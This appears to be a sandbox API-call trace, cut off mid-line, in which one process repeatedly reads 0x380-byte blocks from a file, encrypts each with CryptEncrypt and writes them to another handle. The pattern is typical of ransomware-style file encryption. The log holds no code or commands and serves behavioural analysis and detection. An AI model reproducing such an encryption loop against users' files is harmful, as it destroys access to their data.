1 [0269.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.837] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.837] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.837] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.837] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.837] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.838] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.838] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.838] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.838] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.838] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.838] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.839] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.840] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.841] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.841] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.841] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.841] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.841] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.841] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.841] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.841] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.842] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.843] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.843] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.843] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.843] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.843] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.843] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.843] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.843] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.843] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.843] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.844] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.844] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.844] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.844] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.844] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.844] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.844] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.844] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.844] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.844] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.845] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 